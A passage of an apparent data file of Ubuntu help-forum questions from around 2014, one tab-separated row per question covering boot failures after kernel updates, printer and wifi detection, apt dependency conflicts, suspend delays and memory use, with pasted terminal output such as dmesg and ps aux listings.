apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] dbusexception : org.freedesktop.dbus.error.filenotfound : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory
441872	compatibility between ubuntu and new macbook pro 15 ' with retina	i 've a problem with my new macbook pro 15 ' with retina , i need to install in a partition linux to work . i had try to install ubuntu 13.10 and 14.04 , anytime the installation was concluded successfully , but starting ubuntu nothing happens . so , i would know which ubuntu version i can install . thank you
441873	import libraries in ubuntu sdk	i am very new to qml , qt and the like . i want to add a library ( e.g . http : //sourceforge.net/p/qzxing/wiki/home/ ) for a `` ubuntu - > simple ui '' project . however , i can not figure out how . the instructions are always something like `` add this line to your .pro project file ... '' , but i can not find a `` .pro file '' in my project ! what did i do wrong ? i also found some instructions to right click on the project file and click `` add libary.. '' , but this option is grayed out ! maybe i just got my wires crossed , but as i said i am completely new to qml/qt , the ubuntu sdk and so on . thanks , peter
441878	problem with kernel 3.11.0-19-generic in ubuntu 13.10	a few hours ago ubuntu ( 13.10 ) notified me that an update was available . i installed it , and then ubuntu told me to reboot . after rebooting i encountered a problem : the login screen was n't using the usual , native resolution of my monitor , but a smaller resolution . after typing my password , the screen went black , with only the mouse cursor moving ( and it still was n't running at my monitor 's native resolution ) . i tried to reboot several times , but every time the screen went black . sometimes ( not always ) , after typing my password , ubuntu displayed an error window , with a message related to the keyboard . in the `` details '' section , there was something about `` /usr/lib/ibus/ibus-ui-gtk3 '' . after a while , i decided to try booting with an older kernel version . so i forced grub to show up by editing the /etc/default/grub file , and running sudo update-grub . every time i use the latest kernel ( 3.11.0-19-generic ) , i encounter the same problem . every time i use the previous kernel ( 3.11.0-18-generic ) , it works . how can i make it work with the latest kernel version ?
441879	why do some packages have extra numbers on the front of their version string ?	i have just noticed that wine ( and a number of other packages ) have shifted their versioning scheme to something like : 1:1.6.2-0ubuntu3 i understand everything after the 1 : ... but what does the 1 : refer to ? it does n't seem to mirror the major version . looking at a list of pending upgrades , there are versions like : 2:4.1.3 ... and there are plenty of packages without the # : prefix . what 's going on ?
441883	bash - executing commands in current shell	i was reading the o'reilly book `` unix in a nutshell '' , and i saw there that commands can be grouped and executed in the current shell using the following format : { cmd1 ; cmd2 } i did n't understand how this is possible , as i knew that a call to exec replaces a shell 's data , and therefore the shell ca n't return from an exec system call . so i tested the command and i ca n't understand what happened . i entered into a command line and i 'm not sure to what does the command line belong . is it just the terminal emulator 's command line , stripped down from the shell ? also , how is executing commands in the current shell in any way useful ?
441887	why does apt-get clean requires a reboot before taking effect	sometimes when my disk is full i apt-get clean to free up some space . when i check my free space with df i have no space left , but after a reboot df tells me disk is being used for 52 % . why do i need to reboot before it the clean operating takes effect ?
441889	asus x550la with ubuntu 13.10	i am using this asus notebook with ubuntu 13.10 . all my function keys ( wifi , bluetooth , sound , etc . ) are not working ! wifi gets started on boot up , but can not connect to most of the networks . please help !
441894	increase/decrease playback speed in rhythmbox	how do i increase or decrease the playback speed in rhythmbox 3.0.1 the way its possible on vlc using [ and ] keys ? i am fine if i need to install a plugin for this . there is a similar question on lp , albeit it does n't have answers : does rythmbox have the ability to change playback speed ?
441895	does conky work with mir ?	the homepage of conky ( and almost every definition for conky ) state that conky is a free , light-weight system monitor for x , that displays any information on your desktop . so does conky work on mir ? i was thinking about trying out mir , but i need conky to work , so i asked this question .
441897	black lock screen in ubuntu 14	in ubuntu 13 locking the screen would make the screen black . is is possible to get this behavior in ubuntu 14 ? i liked the old behavior , because i could use it , when i did not want to be distracted .
441898	brother mfc-j825dw network printer not detected on ubuntu 13.10	i have spent 4 days of over 20 hours trying to get my printer to recognize in 13.10 . i have installed and un-installed both ubuntu 13.10 and the printer numerous times . i have spent hours researching this . this is my last hope ! i can get the printer to install as a usb printer , but it is a network printer . the printer works fine on my windows 7 systems , but i want to use it with ubuntu 13.10 . i have contacted brother and was told that since linux is so vast , they do n't do much support ( typical caned answer to get rid of someone ) . i have seen nothing pertaining to my particular problem . someone please help ! thanks
441899	wifi problems with actualizations of ubuntu for notebook hp 1000	the newest actualization of ubuntu since 3.2.0.55 had problems with the wifi and connectivity of the notebook hp 1000 . in order to connect again to the internet i had to use previous versions , as a matter of fact , 3.2.0.54 . does somebody know how to resolve this problem ?
441900	where is the log of pppd in ubuntu 13.10 ?	i am trying to find the debug infromation of pppd on ubuntu 13.10 . i have tried to read the mannual , but i found that the location of the log is for older version ubuntu . what i have input sudo pon dsl-provider debug
441901	how to re-initialize a usb drive after it had been disabled due to overcurrent ?	i occasionally get a device descriptor read/64 , error -71 on a permanently connected usb drive . it 's powered by a single port , so i figure the reason for that is overcurrent and i should think about feeding more power to it , but in the meantime i just want it to recover without having to physically re-plug it . the drive is completely gone from the system , as far as i can tell , it 's not even listed by lsusb . so is there a software way to make the system detect and re-initialize it ? i know the exact usb port it 's connected to , if this helps .
441904	internel server error	i have installed openstack and everything was working well but do n't know what happened now . i am getting this error .
441905	can i use rpm packages in ubuntu ?	a friend of mine uses rpm and has many custom in house developed packages of his own and wants to switch to ubuntu . the question he asked me was ; can i use rpm packages with ubuntu instead of .deb ? as it is almost impossible recompiling all packages he has already . note : the question is about working natively with rpm packages ( not to convert rpm to deb using alien ) thanks .
441906	oem server www directory permissions	i am building a simple lamp that records factory automation data and serves that info locally to tablets and pc 's via wifi . i have it set to boot-up automatically when power is applied and log-in automatically to start apache and mysql . all of that works great . my problem is that , after the auto log-in , the www directory is exposed and anyone can view and modify those php & html files . how do i set the www directory permissions such that apache works , but you ca n't view or modify these files ? to say it another way : i am giving my customer the physical computer box , but do n't want them to view or modify my web programming . any help is greatly appreciated .
441912	how ubuntu desktop graphical user interface developed	i am new to linux development . i know some basics of the linux architecture , that there are layers such as hardware , kernel , libraries and gui . i know kernel and drivers are mostly developed using c and c++ . i know this is common for all flavours of linux . i can browse the source code of the ubuntu kernel and drivers . but i want to know how the gui works on top of all the layers , how it is developed , which programming language is used and where is its source . i also want to know if it is possible to make a custom gui for the desktop .
441914	suspend/wakeup takes too long	xubuntu sacucy on a dell laptop with xscreensaver takes too long to go to standby or wake up ( around 10-20 seconds ) after the lid is opened or closed . was n't like that at the beginning . is there any way i can see what the computer is doing during that time ? here is the near end part of the output of dmesg shortly after reboot . unfortunately i do n't understand much from it ! [ 174459.572676 ] acpi : preparing to enter system sleep state s3 [ 174459.772060 ] pm : saving platform nvs memory [ 174459.772340 ] disabling non-boot cpus ... [ 174459.876044 ] smpboot : cpu 1 is now offline [ 174459.876275 ] acpi : low-level resume complete [ 174459.876275 ] pm : restoring platform nvs memory [ 174459.876275 ] enabling non-boot cpus ... [ 174459.876275 ] smpboot : booting node 0 processor 1 apic 0x1 [ 174459.888784 ] cpu1 is up [ 174459.891714 ] acpi : waking up from system sleep state s3 [ 174459.908036 ] uhci_hcd 0000:00:1a.0 : system wakeup disabled by acpi [ 174459.924031 ] uhci_hcd 0000:00:1a.1 : system wakeup disabled by acpi [ 174459.940030 ] uhci_hcd 0000:00:1a.2 : system wakeup disabled by acpi [ 174459.992023 ] ehci-pci 0000:00:1a.7 : system wakeup disabled by acpi [ 174460.024032 ] uhci_hcd 0000:00:1d.0 : system wakeup disabled by acpi [ 174460.040031 ] uhci_hcd 0000:00:1d.1 : system wakeup disabled by acpi [ 174460.092027 ] ehci-pci 0000:00:1d.7 : system wakeup disabled by acpi [ 174460.108106 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 174460.172562 ] pm : noirq resume of devices complete after 280.661 msecs [ 174460.172698 ] pm : early resume of devices complete after 0.106 msecs [ 174460.172783 ] uhci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 174460.172810 ] usb usb3 : root hub lost power or was reset [ 174460.172870 ] uhci_hcd 0000:00:1a.1 : setting latency timer to 64 [ 174460.172893 ] usb usb4 : root hub lost power or was reset [ 174460.172914 ] uhci_hcd 0000:00:1a.2 : setting latency timer to 64 [ 174460.172940 ] usb usb5 : root hub lost power or was reset [ 174460.172962 ] pci 0000:00:1e.0 : setting latency timer to 64 [ 174460.172975 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 174460.173068 ] ehci-pci 0000:00:1a.7 : setting latency timer to 64 [ 174460.173340 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 174460.173379 ] usb usb6 : root hub lost power or was reset [ 174460.173468 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 [ 174460.173505 ] usb usb7 : root hub lost power or was reset [ 174460.173584 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 [ 174460.173629 ] usb usb8 : root hub lost power or was reset [ 174460.173746 ] ehci-pci 0000:00:1d.7 : setting latency timer to 64 [ 174460.174034 ] sdhci-pci 0000:1a:00.1 : will use dma mode even though hw does n't fully claim to support it . [ 174460.174057 ] sdhci-pci 0000:1a:00.1 : will use dma mode even though hw does n't fully claim to support it . [ 174460.174088 ] r8169 0000:08:00.0 : system wakeup disabled by acpi [ 174460.229750 ] snd_hda_intel 0000:00:1b.0 : irq 49 for msi/msi-x [ 174460.708202 ] usb 4-2 : reset low-speed usb device number 3 using uhci_hcd [ 174460.720090 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 174460.720127 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 174460.741445 ] ata1.00 : configured for udma/133 [ 174460.741897 ] sd 0:0:0:0 : [ sda ] starting disk [ 174460.779152 ] ata2.00 : configured for udma/100 [ 174460.780325 ] r8169 0000:08:00.0 eth0 : link down [ 174461.108051 ] usb 2-2 : reset high-speed usb device number 2 using ehci-pci [ 174461.276067 ] firewire_core 0000:1a:00.0 : rediscovered device fw0 [ 174461.352042 ] usb 8-2 : reset full-speed usb device number 3 using uhci_hcd [ 174461.480232 ] b43-phy0 : loading firmware version 666.2 ( 2011-02-23 01:15:07 ) [ 174461.600269 ] usb 8-1 : reset full-speed usb device number 15 using uhci_hcd [ 174462.037151 ] usb 8-1.3 : reset full-speed usb device number 18 using uhci_hcd [ 174462.106703 ] r8169 0000:08:00.0 eth0 : link up [ 174462.209159 ] usb 8-1.2 : reset full-speed usb device number 17 using uhci_hcd [ 174462.381165 ] usb 8-1.1 : reset full-speed usb device number 16 using uhci_hcd [ 174462.490160 ] btusb 8-1.1:1.0 : no reset_resume for driver btusb ? [ 174462.490162 ] btusb 8-1.1:1.1 : no reset_resume for driver btusb ? [ 174467.013155 ] pm : resume of devices complete after 6840.454 msecs [ 174467.013577 ] pm : finishing wakeup . [ 174467.013578 ] restarting tasks ... done . [ 174467.348709 ] video lnxvideo:00 : restoring backlight state
441915	netbootinstall from internet -- error : no network interface detected	fellow ladies and gentlemen , i would like to install ubuntu 12.04 desktop via internet within having an existing linux , because cdrom-/dvd-drive is dump . current hard- , software : +10 years old laptop os : debian gnu linux kernel 2.6.26-2-686 `` lenny '' pentium 4 cpu 2.00ghz ( exactly about 1.98 ) single desktop internet connection via pppoe adsl netboot install from internet : https : //help.ubuntu.com/community/installation/netbootinstallfrominternet i have followed the given instructions : downloaded init.gz and linux to /boot after restart while grub runs typed input from command-line : root= ( hd0,0 ) kernel /boot/linux initrd /boot/initrd.gz boot very good installer was loaded ! up to section detect network hardware , - occurs : ... error while running 'modprobe -v yenta_socket' ... no network interfaces detected pls help what seemed to be wrong so far ? best regards in advance thank you adeaphon about correct my posting !
441920	turn on thinklight ?	i have an old lenovo thinkpad r61 . it is fully loaded and it has the the thinklight option . for me to be able to turn it on and do other things like adjust the brightness , i have to use the blue function key . but it wo n't work . does anyone know how to get the fn key to work ?
441921	why does /usr/lib/update-notifier/apt-check not agree with apt-get upgrade	i 've got an up to date ubuntu install ( 13.10 ) . when i run /usr/lib/update-notifier/apt-check it returns 7:0 , ie 7 updates available , none of them security . however when i then try to upgrade , i get the following : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic linux-headers-generic linux-image-generic 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . can anyone explain why and how to get apt-check to return the correct values ? if apt-check had returned 3:0 then that would have seemed to make sense , but where did the 7 come from ? btw , apt-check is installed with sudo apt-get install update-notifier .
441924	problems with libudev0 libudev0 : i386 libgudev-1.0-0 libgudev-1.0-0 : i386 , breaks	i get this problems when i run apt-upgrade the following packages have unmet dependencies : libudev0 : breaks : libudev0 : i386 ( ! = 175-0ubuntu9.4 ) but 175-0ubuntu9.5 is installed libudev0 : i386 : breaks : libudev0 ( ! = 175-0ubuntu9.5 ) but 175-0ubuntu9.4 is installe i ran all commands i could come up with like clean , autoclean , install -f , dist-upgrade etc . i think i need some more understanding of what this problem really is to solve it . i tried to remove libudev0 and libudev0 : i386 but it does not work either . what is really going on here ? i have had problems like depends on but never breaks i tried to remove libudev0 : i386 but failed : buffalo @ android-4c56l : /var/lib/dpkg $ sudo apt-get remove libudev0 : i386 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gvfs : i386 : depends : libudev0 : i386 ( > = 147 ) but it is not going to be installed libgudev-1.0-0 : i386 : depends : libudev0 : i386 ( > = 165 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) sudo apt-get install -f gives : buffalo @ android-4c56l : /var/lib/dpkg $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : language-pack-kde-en kde-l10n-engb openjdk-7-jre-lib language-pack-kde-en-base nvidia-settings-319-updates use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libudev0 the following packages will be upgraded : libudev0 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 5 not fully installed or removed . need to get 0 b/28.4 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libudev0 ( -- configure ) : libudev0 : amd64 175-0ubuntu9.4 can not be configured because libudev0 : i386 is in a different version ( 175-0ubuntu9.5 ) dpkg : error processing libudev0 : i386 ( -- configure ) : libudev0 : i386 175-0ubuntu9.5 can not be configured because libudev0 : amd64 is in a different version ( 175-0ubuntu9.4 ) dpkg : dependency problems prevent configuration of libgudev-1.0-0 : libgudev-1.0-0 depends on libudev0 ( > = 165 ) ; however : package libudev0 is not configured yet . dpkg : error processing libgudev-1.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgudev-1.0-0 : i386 : libgudev-1.0-0 : i386 depends on libudev0 ( > = 165 ) ; however : package libudev0 : i386 is not configured yet . dpkg : error processing libgudev-1.0-0 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of udev : udev depends on libudev0 ( > = 175 ) ; however : package libudev0 is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : libudev0 libudev0 : i386 libgudev-1.0-0 libgudev-1.0-0 : i386 udev e : sub-process /usr/bin/dpkg returned an error code ( 1 ) buffalo @ android-4c56l : /var/lib/dpkg $ tried to hold the packages then autoremove : buffalo @ android-4c56l : /var/lib/dpkg $ sudo apt-mark hold libudev0 libudev0 set on hold . buffalo @ android-4c56l : /var/lib/dpkg $ sudo apt-mark hold libudev0 : i386 libudev0 : i386 set on hold . buffalo @ android-4c56l : /var/lib/dpkg $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libudev0 : breaks : libudev0 : i386 ( ! = 175-0ubuntu9.4 ) but 175-0ubuntu9.5 is installed libudev0 : i386 : breaks : libudev0 ( ! = 175-0ubuntu9.5 ) but 175-0ubuntu9.4 is installed e : unmet dependencies . try using -f .
441928	memory is taken up by `` invisible '' threads	xubuntu saucy with 4gb ram . when the computer is restarted and immediately after login , about 500 mb of ram is taken according to free -m. then i run some programs and memory usage goes above 3 gm . now here is the problem : if i close all the open applications , still about 2.5 gb of memory is used but no thread accounts for all this memory . here is the result of ps aux : user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 27092 2680 ? ss mar27 0:02 /sbin/init root 2 0.0 0.0 0 0 ? s mar27 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s mar27 0:25 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s < mar27 0:00 [ kworker/0:0h ] root 7 0.0 0.0 0 0 ? s mar27 0:15 [ migration/0 ] root 8 0.0 0.0 0 0 ? s mar27 0:00 [ rcu_bh ] root 9 0.0 0.0 0 0 ? s mar27 0:00 [ rcuob/0 ] root 10 0.0 0.0 0 0 ? s mar27 0:00 [ rcuob/1 ] root 11 0.0 0.0 0 0 ? s mar27 0:24 [ rcu_sched ] root 12 0.0 0.0 0 0 ? s mar27 0:11 [ rcuos/0 ] root 13 0.0 0.0 0 0 ? s mar27 0:12 [ rcuos/1 ] root 14 0.0 0.0 0 0 ? s mar27 0:01 [ watchdog/0 ] root 15 0.0 0.0 0 0 ? s mar27 0:01 [ watchdog/1 ] root 16 0.0 0.0 0 0 ? s mar27 0:11 [ migration/1 ] root 17 0.0 0.0 0 0 ? s mar27 0:22 [ ksoftirqd/1 ] root 19 0.0 0.0 0 0 ? s < mar27 0:00 [ kworker/1:0h ] root 20 0.0 0.0 0 0 ? s < mar27 0:00 [ khelper ] root 21 0.0 0.0 0 0 ? s mar27 0:00 [ kdevtmpfs ] root 22 0.0 0.0 0 0 ? s < mar27 0:00 [ netns ] root 23 0.0 0.0 0 0 ? s < mar27 0:00 [ writeback ] root 24 0.0 0.0 0 0 ? s < mar27 0:00 [ kintegrityd ] root 25 0.0 0.0 0 0 ? s < mar27 0:00 [ bioset ] root 27 0.0 0.0 0 0 ? s < mar27 0:00 [ kblockd ] root 29 0.0 0.0 0 0 ? s < mar27 0:00 [ ata_sff ] root 30 0.0 0.0 0 0 ? s mar27 0:00 [ khubd ] root 31 0.0 0.0 0 0 ? s < mar27 0:00 [ md ] root 32 0.0 0.0 0 0 ? s < mar27 0:00 [ devfreq_wq ] root 35 0.0 0.0 0 0 ? s mar27 0:00 [ khungtaskd ] root 36 0.0 0.0 0 0 ? s mar27 0:05 [ kswapd0 ] root 37 0.0 0.0 0 0 ? sn mar27 0:00 [ ksmd ] root 38 0.0 0.0 0 0 ? sn mar27 0:00 [ khugepaged ] root 39 0.0 0.0 0 0 ? s mar27 0:00 [ fsnotify_mark ] root 40 0.0 0.0 0 0 ? s mar27 0:00 [ ecryptfs-kthrea ] root 41 0.0 0.0 0 0 ? s < mar27 0:00 [ crypto ] root 53 0.0 0.0 0 0 ? s < mar27 0:00 [ kthrotld ] root 74 0.0 0.0 0 0 ? s < mar27 0:00 [ deferwq ] root 75 0.0 0.0 0 0 ? s < mar27 0:00 [ charger_manager ] root 122 0.0 0.0 0 0 ? s < mar27 0:00 [ firewire ] root 124 0.0 0.0 0 0 ? s mar27 0:00 [ scsi_eh_0 ] root 125 0.0 0.0 0 0 ? s mar27 0:00 [ scsi_eh_1 ] root 126 0.0 0.0 0 0 ? s mar27 0:00 [ scsi_eh_2 ] root 127 0.0 0.0 0 0 ? s mar27 0:00 [ scsi_eh_3 ] root 144 0.0 0.0 0 0 ? s mar27 0:03 [ jbd2/sda6-8 ] root 145 0.0 0.0 0 0 ? s < mar27 0:00 [ ext4-rsv-conver ] root 146 0.0 0.0 0 0 ? s < mar27 0:00 [ ext4-unrsv-conv ] root 346 0.0 0.0 0 0 ? s < mar27 0:00 [ cfg80211 ] root 347 0.0 0.0 0 0 ? s < mar27 0:00 [ kpsmoused ] root 392 0.0 0.0 0 0 ? s < mar27 0:00 [ hd-audio0 ] 102 531 0.0 0.0 31640 2500 ? ss mar27 0:13 dbus-daemon -- system -- fork root 590 0.0 0.0 37140 1580 ? ss mar27 0:00 /lib/systemd/systemd-logind root 591 0.0 0.0 83484 3324 ? ss mar27 0:02 /usr/sbin/modem-manager root 592 0.0 0.0 19396 2116 ? ss mar27 0:00 /usr/sbin/bluetoothd root 625 0.0 0.0 0 0 ? s < mar27 0:00 [ krfcommd ] root 636 0.0 0.1 271524 5588 ? ssl mar27 0:21 networkmanager root 659 0.0 0.1 284248 5392 ? sl mar27 0:03 /usr/lib/policykit-1/polkitd -- no-debug syslog 692 0.0 0.0 247476 1304 ? sl mar27 0:19 rsyslogd -c5 root 797 0.0 0.0 16056 548 ? s mar27 0:00 upstart-socket-bridge -- daemon root 800 0.0 0.0 15668 516 ? s mar27 0:00 upstart-file-bridge -- daemon root 851 0.0 0.0 24236 748 tty4 ss+ mar27 0:00 /sbin/getty -8 38400 tty4 root 854 0.0 0.0 24236 748 tty5 ss+ mar27 0:00 /sbin/getty -8 38400 tty5 root 860 0.0 0.0 24236 748 tty2 ss+ mar27 0:00 /sbin/getty -8 38400 tty2 root 863 0.0 0.0 24236 748 tty3 ss+ mar27 0:00 /sbin/getty -8 38400 tty3 root 872 0.0 0.0 24236 748 tty6 ss+ mar27 0:00 /sbin/getty -8 38400 tty6 root 932 0.0 0.0 4376 612 ? ss mar27 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 933 0.0 0.0 25804 900 ? ss mar27 0:00 cron root 951 0.0 0.0 275628 3052 ? slsl mar27 0:00 lightdm root 994 1.4 2.7 300936 113208 tty7 ss+ mar27 112:27 /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch root 997 0.0 0.0 24236 752 tty1 ss+ mar27 0:00 /sbin/getty -8 38400 tty1 root 1021 0.0 0.0 279004 4008 ? sl mar27 0:06 /usr/lib/accountsservice/accounts-daemon root 1035 0.0 0.0 0 0 ? s mar27 0:00 [ kauditd ] root 1085 0.0 0.0 163808 2988 ? sl mar27 0:00 lightdm -- session-child 12 19 root 1094 0.0 0.0 32692 2836 ? ss mar27 0:11 /sbin/wpa_supplicant -b -p /run/sendsigs.omit.d/wpasupplicant.pid -u -s -o /var/run/wpa_supplicant rez 1144 0.0 0.0 37560 1848 ? ss mar27 0:01 init -- user rez 1195 0.0 0.0 12624 92 ? ss mar27 0:00 ssh-agent rez 1200 0.0 0.0 32716 2572 ? ss mar27 0:08 dbus-daemon -- fork -- session -- address=unix : abstract=/tmp/dbus-s88ckkbwgl rez 1205 0.0 0.0 26516 1044 ? ss mar27 0:00 upstart-event-bridge rez 1216 0.0 0.0 4440 576 ? ss mar27 0:00 /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/x11/xinit/xserverrc rez 1224 0.0 0.2 328460 11808 ? sl mar27 0:11 xfce4-session rez 1229 0.0 0.0 34996 760 ? s mar27 0:00 upstart-file-bridge -- daemon -- user rez 1230 0.0 0.0 26520 528 ? s mar27 0:01 upstart-dbus-bridge -- daemon -- session -- user -- bus-name session rez 1232 0.0 0.0 26520 532 ? s mar27 0:01 upstart-dbus-bridge -- daemon -- system -- user -- bus-name system rez 1235 0.0 0.0 39360 2432 ? s mar27 0:00 /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd rez 1238 0.0 0.4 320204 16784 ? sl mar27 3:51 xfwm4 -- replace -- display :0.0 -- sm-client-id 273d07c4e-c10c-41ee-8cf9-2374cb32777e rez 1240 0.0 1.2 1151052 50204 ? sl mar27 2:10 thunar -- sm-client-id 20caa2dc4-4174-44d3-82ef-fbb67bffe778 -- daemon nobody 1242 0.0 0.0 39412 1340 ? s mar27 0:01 /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground -- no-hosts -- bind-interfaces -- pid-file=/var/run/networkmanager/dnsmasq.pid -- listen-address=127.0.1.1 -- conf-file=/var/run/networkmanager/dnsmasq.conf -- cache-size=0 -- proxy-dnssec -- enable-dbus=org.freedesktop.networkmanager.dnsmasq -- conf-dir=/etc/networkmanager/dnsmasq.d rez 1266 0.0 0.7 526112 31824 ? sl mar27 0:19 xfdesktop -- display :0.0 -- sm-client-id 2da06fe80-f4ae-4839-8b3b-91600fe2eb68 rez 1267 0.0 0.6 348032 24372 ? ssl mar27 0:20 xfsettingsd -- display :0.0 -- sm-client-id 2ba6a0c3b-f588-4771-9570-4b877c7f8c7f rez 1300 0.0 0.0 200876 2908 ? sl mar27 0:00 /usr/lib/gvfs/gvfsd rez 1304 0.0 0.0 336860 2484 ? sl mar27 0:00 /usr/lib/gvfs//gvfsd-fuse -f /run/user/1000/gvfs rez 1322 0.0 0.3 311836 12852 ? ssl mar27 0:07 xfce4-power-manager -- restart -- sm-client-id 2ad69ea99-5f8a-4c94-afef-b10023557baf rez 1324 0.0 0.3 453000 15768 ? sl mar27 0:01 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 rez 1334 0.0 0.0 337356 2724 ? sl mar27 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher rez 1340 0.0 0.0 30488 1612 ? s mar27 0:00 /bin/dbus-daemon -- config-file=/etc/at-spi2/accessibility.conf -- nofork -- print-address 3 rez 1344 0.0 0.0 124920 2956 ? sl mar27 0:01 /usr/lib/at-spi2-core/at-spi2-registryd -- use-gnome-session rez 1347 0.0 0.7 958552 29336 ? sll mar27 1:28 nm-applet rez 1352 0.0 0.9 344436 39920 ? ssl mar27 0:25 xfce4-volumed rez 1355 0.0 0.0 368400 3804 ? sl mar27 0:06 /usr/lib/x86_64-linux-gnu/indicator-application-service rez 1363 0.0 0.0 74664 2804 ? s mar27 0:21 xscreensaver -no-splash rez 1372 0.6 0.1 365508 5072 ? sl mar27 49:29 /usr/bin/pulseaudio -- start -- log-target=syslog rtkit 1374 0.0 0.0 168920 1176 ? snl mar27 0:02 /usr/lib/rtkit/rtkit-daemon root 1399 0.0 0.1 298576 4396 ? sl mar27 0:07 /usr/lib/upower/upowerd rez 1497 0.0 0.1 450192 5196 ? sl mar27 0:02 /usr/lib/gvfs/gvfs-udisks2-volume-monitor root 1500 0.0 0.1 436580 5668 ? sl mar27 0:30 /usr/lib/udisks2/udisksd -- no-debug rez 1536 0.0 0.0 200212 3276 ? sl mar27 0:00 /usr/lib/gvfs/gvfs-mtp-volume-monitor rez 1624 0.0 0.0 289908 2892 ? sl mar27 0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor rez 1637 0.0 0.0 207980 2776 ? sl mar27 0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor rez 1639 0.0 0.0 61360 2336 ? s mar27 0:00 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2 rez 1655 0.0 0.0 64324 2628 ? s mar27 0:01 /usr/bin/obex-data-server -- no-daemon rez 1832 0.0 0.3 476124 15004 ? ssl mar27 0:05 xfrun4 rez 1943 0.0 0.7 450508 28392 ? sl mar27 0:15 /usr/lib/gvfs/gvfsd-trash -- spawner :1.9 /org/gtk/gvfs/exec_spaw/0 root 1997 0.0 0.0 24444 596 ? s mar27 0:00 dbus-launch -- autolaunch=42613f7aae1f969ac75e6e7252f27376 -- binary-syntax -- close-stderr root 1998 0.0 0.0 30652 1188 ? ss mar27 0:00 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session rez 2942 0.0 0.0 302736 3708 ? sl mar27 0:00 /usr/lib/gvfs/gvfsd-http -- spawner :1.9 /org/gtk/gvfs/exec_spaw/1 root 4058 0.0 0.0 39204 2312 ? s 13:54 0:00 /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd root 4067 0.0 0.0 200752 2952 ? sl 13:54 0:00 /usr/lib/gvfs/gvfsd root 4071 0.0 0.0 271324 3000 ? sl 13:54 0:00 /usr/lib/gvfs//gvfsd-fuse -f /root/.gvfs root 4443 0.0 0.1 515556 5524 ? sl 13:54 0:00 /usr/lib/gvfs/gvfs-udisks2-volume-monitor root 4451 0.0 0.0 200344 3384 ? sl 13:54 0:00 /usr/lib/gvfs/gvfs-mtp-volume-monitor root 4455 0.0 0.0 289908 3296 ? sl 13:54 0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor root 4460 0.0 0.0 207980 3344 ? sl 13:54 0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor root 5845 0.0 0.0 17320 632 ? s 14:20 0:00 upstart-udev-bridge -- daemon root 5848 0.0 0.0 42964 1952 ? ss 14:20 0:00 /lib/systemd/systemd-udevd -- daemon root 7073 0.0 0.0 128452 2276 ? ss mar27 0:01 smbd -f root 7076 0.0 0.0 129096 1124 ? s mar27 0:00 smbd -f root 7112 0.0 0.0 91400 1348 ? ss mar27 0:16 nmbd -d root 9236 0.0 0.0 25248 1396 ? ss mar30 0:03 hostapd -b /etc/hostapd-hotspot.conf -f /tmp/hostapd.log root 10401 0.0 0.0 25248 1368 ? ss mar30 0:04 hostapd -b /etc/hostapd-hotspot.conf -f /tmp/hostapd.log rez 12137 0.0 0.1 125468 4216 ? sl mar27 0:02 /usr/lib/gvfs/gvfsd-metadata root 12267 0.0 0.0 0 0 ? s 14:42 0:00 [ kworker/1:3 ] rez 12435 0.0 0.0 178216 2648 ? sl mar27 0:00 /usr/lib/dconf/dconf-service root 13050 0.0 0.0 0 0 ? s < 14:44 0:00 [ hci0 ] root 13051 0.0 0.0 0 0 ? s < 14:44 0:00 [ hci0 ] dnsmasq 13805 0.0 0.0 39416 1028 ? s 15:24 0:00 /usr/sbin/dnsmasq -x /var/run/dnsmasq/dnsmasq.pid -u dnsmasq -r /var/run/dnsmasq/resolv.conf -7 /etc/dnsmasq.d , .dpkg-dist , .dpkg-old , .dpkg-new root 13873 0.0 0.0 0 0 ? s 15:24 0:07 [ irq/18-b43 ] root 13875 0.0 0.0 25248 1344 ? ss 15:24 0:01 hostapd -b /etc/hostapd-hotspot.conf -f /tmp/hostapd.log root 13884 0.0 0.0 20944 988 ? s 15:24 0:02 /bin/bash /usr/bin/ap-hotspot start rez 14672 0.0 0.1 684664 6128 